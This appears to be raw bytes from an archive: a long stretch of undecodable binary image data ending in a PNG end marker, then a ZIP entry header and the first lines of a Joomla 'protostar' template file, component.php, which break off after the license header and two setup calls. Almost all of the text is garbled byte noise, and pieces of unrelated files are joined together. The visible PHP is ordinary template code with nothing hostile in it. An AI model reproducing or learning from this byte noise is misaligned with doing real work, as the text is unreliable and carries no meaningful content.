!Np�|a���mԛ��?���ɧ�'?��>�����S�|;�uHT�q���n�R��!_��[��6���BN^|
��Tԭ9��$��w$�tc� ���ڌ1֣Ic���-��l���˽�ޯ���[��O��Β�
�D�Iz<C=��Ҥ����+˲���?���̽��[o��E���jAËϋۯ����p
���!��]���F�u��'N�h��w ��l6�ޝU�H:�rt
r��`C!�X-8��w���B��ݚ6���B�C6BN4�Id�c3��'�E`p3�:Wۖ����%4c�A�(�j��UN�r�ps�(^�
�^�1$u��/
,	�[�{�Z-A�z0!<���DC�;�S�5�%�Q�B�� ��%Ν�OϞ!������c?��~�h�h �r@_a_ I#��dZX"3C���q�(&�%o�c�Op�T�=��]*)!�.`��V�I#���F�@t���7���)�g���\[������<{�{�K�g������ϖ��N*0�w{����@.��ljEB���_:+<n�{:Ց��S/��HC�\{�RP��͵1�d3H��zh����)���m,2���FcU��I_�r]�rak��� �;�s�Q�^vŢb<#}�9�;��%4���%%{X�H��}C]=���p��7/XvA�iՂ���/8������5L^��
J)�2�3�]�"��v���޹K�*S0������=�x{����Aq%fY�y��j��{6{�-r
\k�<@�5LE$�P��FR��ZdE�L�Ę��d�e��H2�p�߻-W[D`��4�X���:�+�rN�S�8q����	� Z"�+WU0�é�b����}Hx_<�+�=���]�`���UD��]Sv��)A_���r�C�+7�3��I��"c��Y��%���x[�MGC7e�}��7`#�ә�ki&a�侊:�E��~_���!��edEF�Dl�d������_��t���o����_�I�\<��ν��Z2!�-'$0bP�=ˎ:	�3r�M?��0�h�s���Fe�0����
A@]�2;�����f�i����8�ybHl$4�U����u���/v:?��O��e���m�jI�%����{|��r�ك�/7���"��o|���߻�_5kf�^�kێ�l<��r����|�+�S��Ţ䮻�Z�Μ��2m�` �1�K0Ԏ���-�s�rJ-/�Zf���<+�/��%�-V�k�Vs��"����|��3�v�+gʼn+�������@b�a�;|�Hl�V�@��.�������(��x�j��H{�H}o@Iwd��A228�P�3U�=��~X���?�@@ҍ���L{��1������AGT����8r�27�ʾu�6'J�dI&2�`��)�Mz>r#�#�98���ơ%�����A
�~�A��.rAm6�b2�b�$\�'$xr��"!xq���_����F��`�=v.�q�Ռ�{�����
R c0��$��������qH�]��i9��ްb�+�TC�+1��,�m�V��B����qjG��z�	,�N���O�=�h�.vO;������|K���Ԗ�'ے0`�ƒ�gBH�����8"_f^�m����_����[���ɋ��x�;ޱXL,D�'�nQ:��U8�o��r���Ƣ�s�o�rQ�j_W�1�W�f<t
_�J|�Ư_���m-�4��Zx�Xd�P�p
@dZ!��y��a6�$�%ț�ٮ��pI�j��-O+�@H�ʸB�	Nj��lJR$t0�)t��z����~�0p��t��6	F��_�CF��G�� L��ܫ����8!���N�*�}�sl�+L��r�Nj�;��kF.�8μ�M�D�$6� b�`��.���І/��,��{���3���	�0p�;�\>������G����=�3Jq����IVH�1�]�x�1dŀp�kJ��>���=� �s0�Y��n.:�a��Ua�G�{=��MA����ڷ��a��M�:c��K�,z�����ы�B�VSzJn��$���?����=lI^����u҂�`ͅ~j��,�x��~
\7"��ş��W_}��M���*��9{��ӗ)��Y}0
�`�]Ʋ$w�|�1��mYGɀ6��ų�������*��6K�ƨ�����cW�R A��@�9fc�h���;��NKB�����d�s�)c[�*��~�3/�K�f���8���)p�{/G�mI\=GS�I1�T�E65�@��������$�M;�k_>�?{�N��>ł�,s�N�%��3p�U��Y��
��e��������d�W\�J&���LJo������{�})��)	���\�(�LH�>!�K�z�[���/��
H*���_��zy�}��mW졼	!��~��=N0c� E�a�^U�	����M͊{��!�&�7q��	�C�E�X#c���e�W:�\x��'K��/��t`��@�m$	J��ֿ��,*��������n���%s�
H�m����
�l�-j��]�����5I��q`Q�Z4|`L�[Nے"b�]��`/�\��|�|�c��|�|Ϲs�y��}Ŧ��w��*@�����f/��Ɇl5�h)
׀�x��fAQ�����؆��=M�b�{��*�	��,@-�	��M�QW/
X�Iƃ>v4�����@�e0^�N	�ܫ� @�.x���݅W�t$�j������O4$DΩH�Jc�\���JY�&	ABO~�8�1h�Ϣk�s򱟙}�]��HF���q �v��d����=��W0T�1�2�Νsw9��R�f�+�j�|��M?������'�8�ur���)l��t��y���V���u��}�~�~}�����M�$�bX����thِ�v��9�q��i�q'�Y�,
9ޫ�w.r�
�b0ClYs��x��Ӧ�\_��@$1��@�0�ڼ�!��NB�$�<q��ɓ�<�ȏ��.�N�F�aL�nK��.�`ll�x��7X���
O�vG��Zp�bo{A<q��B�� �IW�We��],��7~���{�җ��'Ohz.
!��cb<�3��V�K�#�1�� 5�В'�fj�lۢ؁J�M����a�h�$T�4P;��$��1R�[��s�	Tmま� �j����F"i��q�$m�סà6[E��ә�\��^�}��=�
2�eAA�{�$ Ȉ�L�t��!BȸbI�+* ��f׿�G�/�S`�7��O���?�����nw�I��ο�iFۙ�l�=��m�Y�7%�֬&��Ԋ���6ƉR$v<��<��dOV�Bb�V��h2��LT0Gy��#0j�]����~]����./=�+c�z�[�9��%0@
a��`�"x�R�گ-.�CG�D��@�A>��H�0Z_��cC8���uv#5��+�p$�ڕLjCzm��p��G����\ʚK`�=NN�\�
�&G�R@�"�*�%�����[�u����$� l�Ƹ��d��V]{�O?��#���>��}�����m���� �K�ȯo�,� ے۩g,���^�"'O���������{�;߹��
W%����d�Pi�}��s�}�3�iƂ��QJ����/td�>��W_���&K�P�@X ����Ț��մ1�5e�PC�H�t]3�Hr&�;\�7������(d�z���J\eSh�;ڣ0�CV!	�:�mX��%!
���,��d����W_��
�p�(���s���/
y׃eT���e��%AAv�r�sh�"�dB�]�
]GX��dP�d�1DA�d�?�@��!���l9���������E�0�ev��O�O��x�wA�����^d$���LH�U+G'IT�)W0��ϔ/�|���/��Kl����a��G�T�"˥��߻����v.��W��>�7��\���KOS{́�|������!�L��<�6o��m?�E�x�n���5B���>�Ξ`�7�:�J���`�X$;ū�`Z��K�<������ﰽ�mwk�̤�>���4KR�xw�����&�*]t�9|�p�� �j��H!5�K9r�V��F����T��5�TM��K���?s��w����W��_�K���S��s�&Z�����x��j�Q<h|������~��J�z��^��,����k��f.\XH�
�g�?�c?��_�}�s���P@(PAE��q�HBh@+c/f���k�]�?Vృ�WΤ�MX�y��	H�U���@p
��h
ݶ�D�	g��?9i���
BD純 rf'��1t�� t_#>Y�|Ι��J�Ʉn�4����_���>��o�K���
2��$��"����%,�j�d*�4�8pFo�*L%�OCS�Ә��?;���;�k�7]_�����1{����x��a�s��/��X��@��棛\Ji��$@"c5�{����`���R��3O�3�c�5����g9~���Q+�2���g�tpgo�˳_��
���9�|���.]�����cӭs�D�����8�2��w�8��c��-_�;[��K�Y�-ٿo:�H�J�N���\1P�_~�|��kl �'S
.�`��}��#L�2=��7c�}��L{;�����v?�d�C��8�C8�rFNn�[$�1Z��޺ֲ�@R8LJpj7~�3_��{>�������������+(v5<��������W{����-��^�Bؼ�Y�w]�Z_g�Eɻ��o:,Ơ����[����'���:$��&k��u�m��m/z���p�	 `
v`�曃l���_�q�6�Wh(��h�:+*��{����k��u\}�͎f���d
ɳ��ƭ/e(:;a�au|����������@	��w��|B�s,,��U!��R$��Zڞ�ru���}�N��zP�"��@@5$%�e7%ߵ�ן�~�o�]7�:"��W��������|3�w����o��$���Q��铬�&M���N^}*$6$T��{=�2/��CU���r���[�^Ν��i0�;\������>�6��	$��u󈮭��������z����1�t̼�5w�‰RG�{2�|v��J�vٺ���ؽ4[�N�x�Z�a�ҷ����+C�y�X���<S��@��MB���f޸����6;U
�1=�{���+���?�O;��<��cO͵�l���j]L+�ƍ0�)�m_�h��k�0����z���g?����8ѡ"@r�ѭ�L��7V��4F�{�t(p��1�*�!Wr���ӖP5L'��i|��}GIΣ��͎�򜀱��A��Z
���U,(��I�`��hz�:�|#WU6Ch\
3���3��`�u6�l�"1)/#N���l{;�{hU�]�¦�OM�.17k	�<)$��s��o��J��38�����W �~�\yϻg��'�w2��@�'�76}%ͼr�Q�6���jr"�@m1�v/r�yn�դ@U8������|b��'˩���ެ��<R�t��S/UI8�z���ɗ��f����y�-�hw��I0$l��|n�L���o�u��8t��ȍ�L4���0'�7�1y�+o<~�}��7HsS?�n�g�8�aW�F����-PD`���#���>s�-�,����/�ſ���@핇��v�������D�n���6�$7�o淰����E�b��S����bټ�(�MQ4;�u�m�Ę%V�	^�!��f�T��U�B	��c���D�62t�>Т�Ї6��B �m��!{a�U���p��
H0�7u��&뾉M�z\O\��ޥo���w�Hw�\�>�1�H�B`	`;�Sl��k1i{�7n@�VFV a��`��	s��*]�����#���{���b�R�|���o� 3��>�d����_���#�`�d�P���4WzH�U�c���?��������K2^�-���8vgl]�>��~������/O��|C���Gf��[?�$H�1/����������~!.���}�#<t�IlҶ3+ a;��ߚ/?O_g
�ów}���`r���������������������۬m���c���
$u^����B` J6��چY����(���0��+'.�Կ���)����������y�l��\4$yp��Bvy��~�L���B���pM,�W�������+�����/>^6�A���aD��}�T�!1�#�O�Ɠ@ζ�iE�������>��<�N�ؕ�����Z���C�f����-a΄� �J�2	���4hԧ�wnYa��L^�ȡ�����4����`�{�=����ˀ�r�CEK�p&��
�Aȓ�)��0@:���2ij枘VR�H"T�;G���������Ԣ� k.p�J����{�n�]�mȬfV1�af�� o_���X�}����'�����^��ƛG�?�	Eם~EN��L�BF�m<������y��־�K�j����l���L/���|����yp �&������H���d�޹|퓏�7�={�#����p&N��^�M�����9���OL����I�������S�Ȁr�~���G~���~N�����w��`������M����/������Б���N�4&�Z�>���<.vWzb8ca*ȱv�>���G~i2����������/���̙36W	RҰW���d=����"o��E�b�xZ4�?�����+�ݍ�u��Y	�A�ƻ�j��n�+7'2�z����*+�u5�7���e�qL�a�/rj,�J����k?�ț�����
7����S_\�0�qS��;�=��������U{� c,��m���`�mԛ��,A,eA�	6NH�\L%������Pɩ��A*���.�M4������}q���Ow/~�گ��{~����s�t�E�`V��H��PC_��&M����,��?3}���紿=rw��/��'���˃/�JW�`�������}�ݳ���ǻ��j���ɴ�~�������ɧc�w�!��R���({;�_����M{����U^�z9s�݄o�_��a�m�_8� rd�1�.��<����O��<�Ÿx�q��qd~�C�[�v.o��U�����[�gN��_^y~�̗�ҙU�s����i}s���e�"��e�}b�+��ݭ�!����{��)ݽ�t3Nt��Z
�N��
H�R�-Q�x�k4>k
bOY$��װy������ܿ��������.+�A-7�(
Uæ7Zmte�7��¢{�X3��?��V��߿�?��޺�"��U$�Q�	�j3��GE�����6#��'�Aҕ1�a5l)���ye�����E�:go���a��{m������z�怶�FPU�op��G4]��vo����gխv.�[��3Y�7�oYl�MO=�D�$0�B�dE��z��VXA�@���s�[݄2e}��st�	��ڄ�I��R\�DDAbR耂��Hb-�Dtb-����dO<�w�� ≯�ݏ�&lF�]�����=b�Y�d����JB��f?s�SS���Xܘ��ϵ�L��7�F����W^9����y�7�Z._,�v�/�=��bIAʼn�$l���6g7�\���|μFZR����cw>td����o�.LO������Z�V�@���@!	�L�����[��
u}��>�|�����b}���Lֻ�}u��d��,��8����w����åӅ��s�I��g��tr���⩘�#�
w��x��]�&�x�\<C?{}�ד���M����y��֎�G���~���@�\~�J���Iw���쉘��b��������� p"�'�����uA��`Ѣ�MT'���Xp�d�:{�,������w��w/�wf���c��K)���[����E�y1�f�������'��1Y':�It�V�# ��UA�q^c4�+,P�Ƶ����KV@@+]^����Ӿ��0:�����a@���p@0�઻�a&�,묁�V dW��	�p����Hm%��$�p
!�#7׍#��/>�类9���}a�R��%K �TIAtVAꈉ����vc��
֦tk�Υc���I�B&a$��D�0U�V�S1	:�+LaB}@@3艞���'��I�g��&�}�R���}�,���>�g�3����{Q�s�yh]Y�����u	@%�28QQ9�=�`Hd�,�i�ͮ�ڡ\P8���%�l��o�����ظj��Z��vV�T��wG��
(�.*f�����.�`���(���gԹ3!]N7sm��
`�2��n�������\;�2���\��"@����!OցœY�~���\��#��q��l(�Y�~��W�/ hyi�Yq�L�ܵ��;�>��;�w|���>��_��ݿ�w��?��߆*���G?��?����bנ�'�|�S�����S_�P7�L�:������`��-����qg���w�er�0�Q�q��
Ո1�[���L\i��b�C��Ĺ�1�TB
ؖD�i�r�����ݦE���F6��3e��?4��4�h���
���$�`䥽� m9���=�ʁ�E���E :�ô�W&�iDJ�I	j��J�~���D�}��j�MB_�����_����Q"S+�I_#M:�H�DF�D��9�/�0eŽk���ㄔ����Ȑ�(��i��|��w�>��FIn�L+�`$�q##�&	@
8��P�>Kj*9����ܻIlWe���]!���|q��'�j�H&5��G e-;�������TwHe����`�q�׃Ûu��.>Ԇ��h��<��oG3�cxű��lL
�E��!$e��M���^���N|�}�^x�����g�̟��_��O~�_������-t]��~����?���(����O<��O|�3��ҋ:t\]GE��!�ĉ
24iֶ!��x�
�\+N�Vi�V�j��jƀ��Rt����ho��1����y�����$k���vf�	�R��R�m�ښ�]���0BDX�s�yI���Bb%%�l�KLa���aa��	�`,I�4� ��L�'Y��"��̊�!�~Eb� *L"�c���Ӡ(�� 2��z���eQʾqf	��6�ƦOj�Ι�$�y�W�&�"J�9 <�D(
&��"���=��ظ7"^�Q'"���6���k��ݺ]��cI?,iCh��VbP;]c�$A�!�E�6c[HR؆@�4�qb�f>�'�գaPb0§����q�k�Z?(b4aj��1�w�Q>�1M5�i��`�4C���!�X��@	���X?�������G����>�·���Sǟ�s�O��?}�ĉEL�bVx!�Z����C����o}�[�͋ϋ���E��"=�W��'{��^�C�(
�Q�����4�C��z��`����iH����TW��+�Edg���e�"�u>:V(X������� ��3��I��lC;��A�s�[��`Y��6H�����sc
}e�n
�� C�vѭ����U[x�O�0dE�d)5�'��%R��d�&ҥ'E�X�WJ*D)d��YJQS�\c���S�	vH0D2g)�N ��z�:*����y���#����R+�dOMҸF�Ě�Y+iJ!�B&$YɹcQE"�	���"Y�B6$Œq%40K�{�b�lղ	�@�<es�}m`@�R!+NdQ�m� �y�m
z�66�Gs�*N#
S�QN��T���U����6�ی&��(`�H4:�C�A�i�1l�.��P;��vM`I�(�q�W����'~���}�C�|��ݻ0t<v��b\x}߽����(ڤlG����HZu?`�M]����.4:��1~l�;W�v�k��f������bk��_x�k�<��K����1
EAW�7��m�3~B^�L9#V�i�rh��+E;�=f�6�3����@
t��k˸I@\�D�܉$��U�L0�����<����9�#�W<�kׄ��vJ�td�u�G�_T��D�@`!/W'��6؉�2Y�
 ;$�B�H$Vh�r�]S3&����$�s�,���LC@&s0��JOV(|��g�A_��U6}b�I�����>�&�d�J&N\�pf��2�d�#�eePR3>/c0���|s1.�AN���M�$
)�cl�Q��̽����=�D !��8(%��)��un'
lhGB-�Te��sn#��f�o�=J6͖�`u��V(WB��%!|��%��	M�z�Y��G��z���)G
�
�L6�e�v>��/�~�co�����s��o<~�M�mL^#�fNiE�_Cr�-���k�~�c�>��?�k�A���vv��_�t�܅�N�}����l�c=&��D(��#:E@�8���H%����5��3���T�FlWh�m�i��(�Y���V�2���aGj/��̑5���HcM��6N�{`ԆV�M?"��QI8��[j��7h����[Pa��2���C&Mg���+���iI�I(�@Z ��5�.�щZ�朗�q!+�0'�(¦�0#���O�(��d�vBV��JB�ZqOo�+����6��z�+�-0�s��#��Nl�+_jh'*̒��AB���-�_�&�%�$����	��B	@ƶ-	RĠMg��7!ߎAo�R�i��L�ܒ%˸�.��`h���5�H����A��e.f�/��sG	Rt��Hձ�V��nr���W�ܦ��4э"��%�C��>��֯?y����ڤL%�p�ץ߾����J��7'_=>�}�Т�:\_�o�ìz���޼�S���h�X��+��eɒx쿬�wIy��z髞H-o�F��ۅ�ۘ�������1}��n�B"���<֓�XO�X+	�F&�u;�~�hס�?X\Qׯ�&4��7��!�Ku[���7Uu�Yɢ�AѦ	K�J�v	�)�Ⱥ7�����	C�N�
�p��$��H|����y��ʓF�(�=Yo�<co���zm?�ԫ��,�5�^���ѭ�����W�GV^��������z�i�m{S�ݵ��
�R�{����o�6Cu�aȢYT��F�1T�C� �n��О�ܜG��Zz����:�-h[$K�hD��Pm$"I[��%Q��������6�HG'It�B���߲R�&��N9�˕�"{^Զ����Z::Tn��|�J �ZV^���I홙�..琄*J>�YC9-+�+��ɼ�Vgۻ�d��ǿ������:�����ԁ_4$�N	��s���=޿!E�������2[7su��E��9�����MHt��y�X��U;x�d��z���(rƗ�����}?ω����((ȇ_���Ta�@Dh���D��F��a��^@q�o(�$���H���^������H0H��ItQ���􃭯�&��G-*IO`G+�N�W�WG��W�W��mie�h�
�&�tvޑy��ˊ�g�z�����x=�?��k�I�2?*�y�d{�5f�ݎ���]S��1�����s����h}����=2��6��KF:��u+C)�Сq�T�,3 Ds�S�[�B�VNhj�I�HrǛP?紃���PS	mg�ݖ;2�M���jI|Y��D�	�>�ʪ�W/X�u�H����ӴDPHH�ބ|H2G܃`�Υ�3��l��DWV��#i'yYc�������o��>ߘȹ�Y:���Œ$i��9�� �d�D�g�"�F[��<#m�<�Қ����C!�@r6�.I`t��X+V��{����z�e��<� �h?۽v�9/
��גG�(��%�F��XA4 �_(���$��^1W�\M-9nU�PB��vPQB�Ȋ�r\Bi$>X֣��#e@$Y�v�H �$�",Yl����:J�W��1�Jwc$�(+lky7�m��i��M���g듯�je(��Jʳ=4t~v����Nc���vu{�i囚y���L�x��N���ڙ����ȗ�nE�4��D@Q]$��D�����h���`,�ECU#�pv�ޢ_m�2�@�(��%*}�++���z��JX�B;�Խ?��@��m���F�J����j��/���Ň�PF	��C~�h����V�cm�5����64"(��`A@���E�
�F��-��?�;��$D���Ԏ�,��*%�J�FO�ރ��,��&땕v�m!�bY_$�2��Y� ��}��Ad����^�s���vF�O�g\�;+�T?�t�P����D��&ߺ����?K)*I��"��q��MQ�;F��/�H�E��"Z$�њ�IV��7�z���iCuތN�H��bjȲ�M��Ķ�Ċ��]��l�Қ�2l6}`f��5c�6�3���f��#�z���Ҵ~�y�ئ�6omg����MQZHM��o�D�VKA*4�ām�h|$qZ�Vk-m�9����:d���S�4ZzٴR���Z�b��������4�X�tB�Asfn�^=���,�N���9��? ��>���I>���NVGr������XҶ�tQ��h�d}����{܃;I{��^���(�����&��I+"�BP%R T	n��
:B�6Aet+��I�&yD�V�X��ZA��Ο�h��պ�J�KJ �u�}>�J�¶�.�@��@��$�$�N�~��
B{7��D�j!i����38S��m˓gu��
�g�E	D��tvM�D
�h��*�&m���S�Uiޕ��JDV��7�%O�x|O�V��/ϗ�[��#���'�
����Z��v�{���
5ӳ.ۙ����ev�uSټ�o��P*��d�
ř�P-��Th%RYԹySrx�r5��%KB�%5��7T*$���5��B]CT�e%��N�$y�!"ڡ,B����QThA��H�<��~"��;U@!�����ǟ��Œw�[��R�@�����o�d�eA
�VQZ�D�V�����[���;{}E��jX�������"9���Cx�>���G�
y��v��̀�����J#,�HI�#��
g�E����r�%
��/��D��3�������$�BO-�㔁 P���H~��3+I[PڊT���IU+�;!C�QF+�Q�']�"���j=歑�,�J��4滑�$UӴ:���Ҵ��SCtI�I��^�k:y�?���W�z�z�6ֻM&�f{���l�����w3�fi�5e��][V����6]{fF�ߙm�֩.�"�J�J��4��)(t@J�-�-�p�+�a"֣ÖHt�F$$��dQ�ٝ7���9+��/fY�TE�G�Z#(ت��~v�a!�W����پ	��ԕ<89�}I\��=IB����ޕ�JV��3�E����\WEB5T�tYXZ!t)Yɺ~hnL�H�Ν�>�KY�C�Σ~���ŒG��n>M�S;�� (���H=k�}��A�=���盐ZH���Gµ.'�S��{/��{���I�]��� px�*�I�_�{�������
R��>�j���{�N��M�B,�#H�;���dm�C�G�����dդSH�(�Q��/��m��z$���v��&���T�."Ϭ�5m)�J͢Y:�z�K�2�V��|�t챷)����ִ�d����NkF�ff�����7[QP�\!Y���0ed���V�˲�枍�s��Fr$�g�ە%K��3�$�@�(�$�Fٶ4Ym��M�F�U�-et7�ܭ�BK@�T;���**� @5��q����^�:�y�b�������UFG>�i��9���87�/*��s3�+��GBN
	Q�,%��GNi!�5gر�d}e�ZH+h�[v,��-Cq�9^}�^��S"�V+���uОt�=��d=���~�~��"�$�Z	y�R��joI���Uz�kA������j��8��H�t"es���:R��V����v
����Y&�6��Z�$@���1�$��&�1�Ó4�UeQ1�t7+Rk�]���� �Ȓ��y�|%���k2+;kjy
�i�����wux�=$m����`+_�6cojo�ugJ�2t����Hc�#�_ �
��U�HLup�0	�DO�IU��r�4"���-�Jz��V�jT�6+��uVW:�����AK+ڞ�zILK��6߂�
�ٮ �3|�
iVH�N��������k�E���@�҃h@NVD��JN�4Y���dB*��z�}K�n�m-F�YJ�-,��}'�.M"�"G��ou˽���M�<X�vҷ��7p|cS)w�9ҋK�c��F�J5,B�P�0���©7D�����t�ҁ����Pk%K�T���D�[]&Z�IȢڿ���r�ڗNg�%��@\����՛�3G'4��"���S��#@#t	hH�r��p�ckg%��O�Y���E#��qZ\��HtIdY�h!Z3�f��,4VT��6�W�jV�ɪ.�7K۬�KƎU{�h���;ZÌ�=�����^���1�&*��+*��1әt��ߝ��F��� 4�H�C�Q�QZVɉ�J��(r��HH����$Bt��$�/Q0��ҡ I*ڒ �T��" �H̴�j�DE
��=��,(���4H��X���Iu�iI8P
���1cY��䕯�w ��n��B�Ŗu5;T�d�P�"�PV��:�N��+7�X�����-�
ط�,���Tџ��!Z�)�x��w���T)M��UO�������W���L����"�T�A�>�g���M$�d�R��̈�OxTAXD
�HY�ЏI�P�%э��� (^�&�����b��`$7��&��E9g�W�0��BP�;��T��ZD1���
���J	h;ע�B��J�i~����ߴ�F�A��oR�J�*	����D+���O�4�iW$MCxt�c=iug6��|��^���⑥��z�����D��e�{2��&������ݙ̎z��3!3�e�T����}M��w�?�:5A����Ax$�	i��䲐Ŝ�y����퓚�'?N��$kYq�8͇��uIЎ3�A�U���]�I�hCC ��hw���ג 4҄�Y�m�f��l���-�s��a'U�j�ˉ��u���J�3w]����m�j֏D�(̻=�&���?T�����YG>\��P�J���~.h�e�� IՒ��z*"�mD|��~H����q����G��*�8_��n���h��Ыj_�|���Z��L�v��;�(���i�D�Er��>���8�����i;?�K�Pw|zWB���U����%�ѕX5�d�ʝFWB5��B["�;E�+*E�jNJ���k�X�l�]�T��Z,��<���w��Y�d���*�iV؅�f��{�o{̻��i��f��˼}���T��1������_t1mZ��i��^D�i���%+�n~�3�y���NǗ�-t���+HdE
�z�ς(����<:f�m��h�z��[ ��I	�k�9�Z��@K+$�[�r�eA��O�}�G��-.�s%��^{�R0,g�M��h��,9��H�G^���7�׷y'��dE�Z�ALK$�0[��[��ȉ��-�-X�P�J��0��?��:�f:;�*>4�!N�\鯢��h����E�)���]Q5-X�\/������?��A�g�#�je%���DB�nҹ"��3ݡ�DrMr&�$�#��[ɪ=�v
� �l]��XI�DHHH"���L�*Y$�V:*Y�@?uw�J�H@J�D8� ��"��R*!l�;�$mL:��Ȧ�$���NK���J�iV'�j:����ߙ����N���}����Ll�͘Ƙ1?Y���{�[��I'�̀���(MBL�������1oF�ҕ��?��;[T�?BBHI�[i�P�O��J�P��j���,��di;o{w����d=D7��rbp>A��$g1�#8z�כ,9�Fm;Y�P�Ɲ3CNzw��>Y���Xz-����/�nNde��h�V+���6��F�RN�8+R��p[�,����ۯ�ur�ഐ�U)��+|~<���d�d����e��Ǝ7Ց� �D>���?Zι���^�c� D�E���P�@��@�H� gg,�q>�Kp��갈$�ҡ���v�J$W�+}C�,����	�:'���`=H{�
�t�D�i��pV�G0gLZR+YKB�V:KG��Ŵ�a ����RJs�BA�$!��O��6޵d���Y�4]��À�
H[+Y2���fYKYI�I:��V���'�lM�h;:Lߣ�tg��n'��h�$S*+e����to�L2��2#cFjk��K�$�W^t�Ӧ�!���+#��,΢ F�!�Ո�Iu���lEB)'BG�A%r���%hwg�5�ҭ�s�
e�KB�J���mM�J8� r{	V��,�\���l�t���!}__��k=����D���gc��Rg\��P�{/�p+G��dr~4�e-���(=w�|�d-��侽�J���N�H�*K�JF�H-4�)�M?L;�R�ֲI�V-�"��ᖛ��G��s,���
%B�!�����՝��)p��-�b>��TGq8��H"��~	�4Kr��3���,ɒu��M��V���o�y�oN�]PD�;��P"�EB� ��]l8�H�u��Ш�*Em�*�I�4�J�����e�t��$RRSS��׽���wfg�ٳ۽3[ߺӝ�3��w����Ď�ѝ����N2鰩N:�%��!J��"�#�N���$�o�R
�=��L<$I������XK��&���E�c�nD�C��Z��mI��v�P-��;/��S&0!�xR�N[IH"��Ċ&�H"�8\7� СV�K�'��Z:�`��Ⰰ���I�Zq_���<��뻽;)*W�3O�
f�H$��U�������v]X��?wK��fK�N�u���шD�Z������@���%(PI�<�<_Qݲ�����mo��،ȒhAi^/���{�1�u}��,`n��0��/�q�UE�%X��O�R���Y�`ސ*'i�P
���C��eE�HDRK
iJN�"*����%�3�|�z���ҭ�VD�P)�j�td=�4�"t�n����Q^���]���U�Bw�gz�3��f���I�~�tUic-	5���V�	���&X:,���d:?Le�~�'�0�gQJ� �$B��D$Ǿ���PB�i�qAS�R(rt�ͪ�`QYW/J4P�h�F(��8��jƧ(U�sh����m��eb���	���i(�hH;)��4,�jVB$�١��.
<MeE$��k�ֺ��n�,�ԍ�j#ܸY�D��.ȹ�N��{I%tF��>�L-H�Jz����ST�Oq��׹ŧ��2��m��J�����$�l�_�/��R�XT@�9-�`���zdi)�\Z��ѥN�Dh�կ�S"H+�G֣S���Ud%���#�%���K�D���I���twӨ6���L!��%�8,!�D��t�zi�3VI$M���6D�V�n�H�by��zev�[*�B%Qʘ�wfL��y�6��[��NǼ�2�옴1�M�h�Ƙ&��Uv4^2IF�A#T$$	��LRk	�3��bJzn�$AY�p��j���D�&diu��{��
�����kod��ڬe-m���Ւ�`!I8�0Z�&n�$ɢ�dj#�E��r��8Ͼ���D�E�	� !���P7҄��U�=d����Y��&:G>/�k�{�ֻ~�2���
�,�[�2ə�T)$$J>�l�ӥ�)��F��pk�iwZ��I^Y_��Վ\z��H�αB��R$Y��!�K�����|hF�l�ĕ���.�rʹ�%?*�M0:�d�d�]��"iT�K@甍\��V!�R�l�$*$@�yYG=DN�ϒ�H��.��n->7s����2")ҦV$�4C�������Ktތ�j�$�2��;['�̤;{~j���ǎ�}��6[���7;�؉�T7�V'�T��d(խ�MZ�f�ԒЉ���(�D�y�|I�V$9��@�,q�bԉ��z$�&�3Q�Y��@0բI�Q�ܳ	K�'k�(!������m�Hd!�?Mr���9 ����,|n�$+V-!4HGi�$A�$aw�5�)���rON�r�	H�Tr�[ה�+W��������J�@�R���ti�~[�#NT�$��!!q�6�Vb=�I�EP�$����������=c�����B���CrFWwa��Y�$�H~�(��h���j,IJ�@�����5[wR!�Z�m�����fkeгh�(�&Z�*=��;��4E9[��8j@"" R��(�N������3::�-BJd��j򳬛�,�u���b�hLf:�Ju̟Y����t2��cI�f���
PS�LRh͎R-�錄ђ$��$��� �$`��H��d-��z��8��
A�%���l?б�S_���J)$$� �iuHD�u[� ���T�ڣI�"TV�W���3�zh<Z!gęU+y�|i)�㎙kk��4$��|�䅢�܊���ڔ�����UR��:C/�n$WN%��>��c�Z�H�k�IrzŽ�3膜.=B���q�z�aR��O,���ϫ*��g�{O^_�ߺwR���C�����~`χω��J��j��i��?����I�*9�3�h)հz��ai���懊%�,i::�Kΰ8��h��)H�.�:�U�]!�"2�P�I��J�x��S�2���a��'�Db��L٤ӔNLgҷ�~Q/��3��[�EX�cF+��D�JE�>�Dev� %�hI�I�_����J���V�J�с^=���io/S����싈�
�u�oo)K[(
$Bu���Qx�_+PQ�M\V�g����|�t��%��IT�^}+H������V'J�./���BVR����7��cJ�#�N?��!�r�2�\������[�Z��91}1|��s/�)�
�4K�uٝj�Op���3 D��}�S��{�ND�ޅ�"��eF��%�~��*����"�&�<L�}fj�;3ޓ&�WO�e���-��( �lY�*ȉ�rt:U��D�/=�T�@�D(qL�=5�D���c6���
���R�</�y�fT9�V���TN��$nK�jB�UV�Z�*�#_�%��j����,		�Q����jF�:Qv�;�h[���%MHKQ$�2��&��ɒ��kU��2T-)	��"�,RHի�vId��3�!TGA�$�_^���d�-��:JHt:����j�M("Ѻ=K��,E���B�s������j�G���$����
��Y_�����G�h��@q��+�2��N+�;�G�g>C�ũ�:�x��R_K7>�r$�� ������,G+��ܫ�Cn��VMˇ)��.�V]��On
 �'����9���u=1ŵ�#�p�9�Տ��6�-����{�sY*��ߴ�zi���H5�D���;�8�j��%�X�Csdt�r��ֳ���a���$�c:Jr}��$��~څ�=y@�vD��P�� ����"�hBr��_��RT��3��E7Pi;#�ic��њa�m�L�l݌n&*�Z��tVH�H0���fҦ����%���4���F$J�n�$Z�$I�V��h��$8�|r��LP�d�E$B�
I��[Or��h��J�TA�
I���>��e@�����@��x�B�SS(�Ӗ�$K"g^遬	i۾	��{TK)7_����Pș���B����,
V"!Br4��=,�˖������Y��J�w�&=%8��p)?���o,�+���g��ZO�O���q�+�&Z����De�{N�J���Et�M�*�(��,�6��lqZ|�;2��-n;ד%�9�
m�,
�֝���9'&��nﻓ���*4�)�XDC$�dn�G "Q��E9�2r+����%$t�M��j��OmԷN[G���h�Nw�Ҧ�)�J3b$�9�,P$�@���5��R�V�9�h=Y���Z��8D�,@$�/Ptꒂ%���	"�R��7��h	J�TL5pn�J���8��I$|`$�X)9_�,�,	��+�3t3Ir�,Yn8vZO,i%��R���-��>���Cj	�]D����v7t��=p�f�!�arVO���{uuY�K>���p����9����[��{�z�����z��ZE���/IEND�B`�PK՜�\�O3e))protostar/component.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app = JFactory::getApplication();

// Output as HTML5
$this->setHtml5(true);

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
